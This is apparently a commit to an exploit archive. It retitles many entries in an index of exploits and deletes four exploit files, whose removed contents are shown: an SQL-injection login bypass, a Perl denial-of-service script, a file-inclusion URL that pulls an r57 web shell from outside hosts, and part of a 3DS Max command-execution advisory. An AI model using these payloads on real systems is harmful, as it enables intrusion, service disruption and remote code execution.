DB: 2016-08-27

2016-08-27 05:08:40 +00:00 · 2016-08-27 05:08:40 +00:00 · 4011b4f053
commit 4011b4f053
parent 9be5679994
5 changed files with 17 additions and 359 deletions
--- a/files.csv
+++ b/files.csv
@ -2001,7 +2001,7 @@ id,file,description,date,author,platform,type,port
 2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0
 2305,platforms/php/webapps/2305.txt,"AnnonceV News Script 1.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0
 2306,platforms/asp/webapps/2306.txt,"Zix Forum 1.12 - (RepId) SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0
-2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
+2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
 2308,platforms/php/webapps/2308.txt,"C-News 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
 2309,platforms/php/webapps/2309.txt,"Sponge News 2.2 - (sndir) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0
 2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0
@ -2018,7 +2018,7 @@ id,file,description,date,author,platform,type,port
 2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0
 2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - (dwpage.php) System Disclosure Exploit",2006-09-07,rgod,php,webapps,0
 2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Inclusion",2006-09-07,"the master",php,webapps,0
-2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0
+2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0
 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0
 2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0
 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0
@ -3687,9 +3687,9 @@ id,file,description,date,author,platform,type,port
 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0
 4033,platforms/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",windows,dos,0
 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0
-4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-05,s0cratex,php,webapps,0
+4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0
 4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0
-4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-06,Silentz,php,webapps,0
+4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - index.php 'epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0
 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0
 4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0
 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0
@ -4539,14 +4539,14 @@ id,file,description,date,author,platform,type,port
 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0
 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0
 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0
-4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-12,ka0x,php,webapps,0
+4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (1)",2008-01-12,ka0x,php,webapps,0
 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0
 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0
 4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) SQL Injection",2008-01-12,ka0x,php,webapps,0
 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0
 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0
 4904,platforms/php/webapps/4904.txt,"Binn SBuilder - (nid) Remote Blind SQL Injection",2008-01-13,JosS,php,webapps,0
-4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-13,Pr0metheuS,php,webapps,0
+4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0
 4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0
 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - (day) SQL Injection",2008-01-14,nonroot,php,webapps,0
 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0
@ -5837,7 +5837,7 @@ id,file,description,date,author,platform,type,port
 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps,0
 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0
-6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal",2008-08-11,"Simon Ryeo",multiple,remote,0
+6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0
 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0
 6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0
 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0
@ -9367,7 +9367,6 @@ id,file,description,date,author,platform,type,port
 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0
 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0
 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0
 9996,platforms/php/webapps/9996.txt,"Article Directory - 'index.php' Remote File Inclusion",2009-11-12,mozi,php,webapps,0
 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0
 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21
 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21
@ -9511,7 +9510,6 @@ id,file,description,date,author,platform,type,port
 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0
 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0
 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0
 10212,platforms/windows/local/10212.txt,"Autodesk 3DS - Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0
 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0
 10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0
 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0
@ -9769,7 +9767,6 @@ id,file,description,date,author,platform,type,port
 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF",2009-12-17,bi0,php,webapps,0
 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-site Request Forgery",2009-12-17,bi0,php,webapps,0
 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
 10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0
 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Shell Upload",2009-12-17,Stink,php,webapps,0
 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0
@ -12347,7 +12344,7 @@ id,file,description,date,author,platform,type,port
 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80
 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0
 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0
-14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0
+14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0
 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0
 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0
 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
@ -12393,7 +12390,7 @@ id,file,description,date,author,platform,type,port
 14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0
 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
 14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
-14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0
+14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",php,webapps,0
 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow Exploit (Metasploit)",2010-06-27,blake,windows,local,0
 14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Remote Shell Upload",2010-06-27,Mr.Benladen,php,webapps,0
 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps,0
@ -12719,7 +12716,7 @@ id,file,description,date,author,platform,type,port
 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post-Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
-14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal",2010-07-28,mywisdom,unix,remote,0
+14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File inclusion",2010-07-28,Ahlspiess,php,webapps,0
 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0
 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0
@ -14776,7 +14773,7 @@ id,file,description,date,author,platform,type,port
 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0
 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0
 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0
-16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,Metasploit,multiple,remote,0
+16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,windows,dos,0
 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0
 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
@ -23387,7 +23384,6 @@ id,file,description,date,author,platform,type,port
 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 - RateThread.php SQL Injection",2005-09-09,stranger-killer,php,webapps,0
 26248,platforms/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service",2005-09-09,anonymous,linux,dos,0
 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0
 26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-12,"Infam0us Gr0up",multiple,dos,0
 26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0
 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.PL Remote Directory Traversal",2005-09-13,h4cky0u,php,webapps,0
 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0
@ -31427,7 +31423,7 @@ id,file,description,date,author,platform,type,port
 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0
 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
-34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
+34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Exploit (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@ -34174,8 +34170,8 @@ id,file,description,date,author,platform,type,port
 37844,platforms/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0
 37845,platforms/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0
 37846,platforms/windows/dos/37846.txt,"Flash - Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0
-37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0
+37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (1)",2015-08-19,bilou,windows,dos,0
-37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0
+37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos,0
 37849,platforms/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos,0
 37850,platforms/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0
 37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0
@ -34210,7 +34206,7 @@ id,file,description,date,author,platform,type,port
 37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0
 37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0
 37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0
-37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0
+37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0
 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::CreateFromScriptAtom",2015-08-19,bilou,windows,dos,0
 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999
 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
@ -36084,7 +36080,7 @@ id,file,description,date,author,platform,type,port
 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF (Add Admin Exploit)",2016-06-06,"Ali Ghanbari",php,webapps,80
 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0
 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
-39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
+39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80
 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0
 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80
 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80
@ -36358,7 +36354,7 @@ id,file,description,date,author,platform,type,port
 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
-40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
+40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80
 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
 40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000
--- a/platforms/asp/webapps/10521.txt
+++ b/platforms/asp/webapps/10521.txt
@ -1,61 +0,0 @@
 [?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
 [?]
 [~] Tybe: (Auth Bypass) Remote SQL Injection Vulnerability&#8207;
 [?]
 [~] Vendor: www.activewebsoftwares.com
 [?]
 [?] Software: Active Photo Gallery v 6.2
 [?]
 [?] author: ((R3d-D3v!L))
 [?]
 [?] Date: 17.dec.2009
 [?] T!ME: 10:22 pm
 [?] Home: WwW.xP10.ME
 [?]
 [?] contact: X@hotmail.co.jp
 [?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 [?] Exploit:
 [?] E-/\/\A!L : x' or ' 1=1
 [?] password  : x' or ' 1=1
 [?]demo:
 [?]https://server/demoactivephotogallery/account.asp
 N073:
 REAL RED DEV!L W@S h3r3 LAMERZ
 GAZA !N our hearts !
 [~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------
 [~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987
 [~]70 &#1616;ALL ARAB!AN HACKER 3X3PT : LAM3RZ
 [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4
 [?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))
 [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA
 [~]spechial FR!ND: 74M3M
 [~] !'M 4R48!4N 3XPL0!73R.
 [~]{[(D!R 4ll 0R D!E)]};
 [~]--------------------------------------------------------------------------------
--- a/platforms/multiple/dos/26250.pl
+++ b/platforms/multiple/dos/26250.pl
@ -1,58 +0,0 @@
 source: http://www.securityfocus.com/bid/14802/info
 COOL! Remote Control is vulnerable to a remote denial of service vulnerability.
 Successful exploitation will permit remote attackers to deny service to legitimate users or cause the client to crash.
 COOL! Remote Control 1.12 is affected by this issue. Other versions may be vulnerable as well. 
 #!usr/bin/perl
 #
 #      COOL! Command Execution DOS Exploit
 # --------------------------------------------
 #      Infam0us Gr0up - Securiti Research
 #
 # Info: infamous.2hell.com
 # Vendor URL: www.yaosoft.com
 # 
 # * If Remote Control(Client application) is running then already connected to server,
 #   this command exploit will made Remote Control as Client disconnected from server machine.
 #   But if the Remote Control is not currently connected to Remote Server,then
 #   by send specified command to Remote Server its allow the server crashed/closed
 #
 $ARGC=@ARGV;
 if ($ARGC !=1) {
    print "Usage: $0 [host]\n";
    print "Exam: $0 127.0.0.1\n";
    print "\n";
    exit;
 }
 use Socket;
 my($remote,$port,$iaddr,$paddr,$proto);
 $remote=$ARGV[0];
 $popy = "\x31\x31\x39\x38\x30"; 
 print "\n[+] Connect to host..\n";
 $iaddr = inet_aton($remote) or die "[-] Error: $!";
 $paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!";
 $proto = getprotobyname('tcp') or die "[-] Error: $!";
 socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
 connect(SOCK, $paddr) or die "[-] Error: $!";
 print "[+] Connected\n";
 print "[+] Send invalid command..\n";
 $empty = 
 "\x49\x4e\x46\x41\x4d\x4f\x55\x531".
 "\x47\x52\x4f\x55\x50";
 send(SOCK, $empty, 0) or die "[-] Cannot send query: $!";
 sleep(2);
 print "[+] DONE\n";
 print "[+] Check if server crash!\n";
 close(SOCK);
 exit;
--- a/platforms/php/webapps/9996.txt
+++ b/platforms/php/webapps/9996.txt
@ -1,5 +0,0 @@
 An attacker can exploit this issue via a browser.
 The following proof-of-concept URI is available:
 http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirot_r0x/r57.txt?
--- a/platforms/windows/local/10212.txt
+++ b/platforms/windows/local/10212.txt
@ -1,214 +0,0 @@
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/
 Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
 1. *Advisory Information*
 Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
 Advisory Id: CORE-2009-0909
 Advisory URL:
 http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution
 Date published: 2009-11-23
 Date of last update: 2009-11-20
 Vendors contacted: Autodesk
 Release mode: User release
 2. *Vulnerability Information*
 Class: Failure to Sanitize Data into a Different Plane [CWE-74]
 Impact: Code execution
 Remotely Exploitable: Yes
 Locally Exploitable: No
 Bugtraq ID: 36634
 CVE Name: CVE-2009-3577
 3. *Vulnerability Description*
 Autodesk 3D Studio Max [2] is a modeling, animation and redering
 package widely used for video game , film , multimedia and web content
 developement. The software provides a built-in scripting language,
 allowing users to bind custome code to actions performed in the
 applciation. Execution of scripting code does not require explicit
 permission from the user. This mechanim can be exploited by an
 attacker to execute arbitrary code by enticing a victim to open .max
 file with MaxScript application callbacks embedded.
 4. *Vulnerable packages*
   . Autodesk 3DSMax 2010
   . Autodesk 3DSMax 2009
   . Autodesk 3DSMax 2008
   . Autodesk 3DSMax 9
   . Autodesk 3DSMax 8
   . Autodesk 3DSMax 7
   . Autodesk 3DSMax 6
 5. *Vendor Information, Solutions and Workarounds*
 The vendor did not provide fixes or workaround information.
 You can disable the automatic loading of embedded MaxScript by
 following these steps:
   . Go to Customize menu > Preferences > Preference Settings dialog >
 MAXScript.
   . Uncheck "Load/Save Scene Scripts".
   . Uncheck "Load/Save Persistent Globals".
 6. *Credits*
 This vulnerability was discovered and researched by Sebastian Tello
 from Core Security Technologies during Bugweek 2009 [1].
 The publication of this advisory was coordinated by Fernando Russ from
 Core Security Advisories Team.
 7. *Technical Description / Proof of Concept Code*
 Autodesk 3D Studio Max provides built-in scripting language called
 MaxScript, which can be used to automate repetitive tasks, combine
 existing functionality in new ways, develop new tools and user
 interfaces and much more. Max allows users to bind MaxScript to
 application callbacks in a way that could be exploited by an attacker
 to execute arbitrary code by enticing a victim to open .max file with
 MaxScript application callbacks embedded.
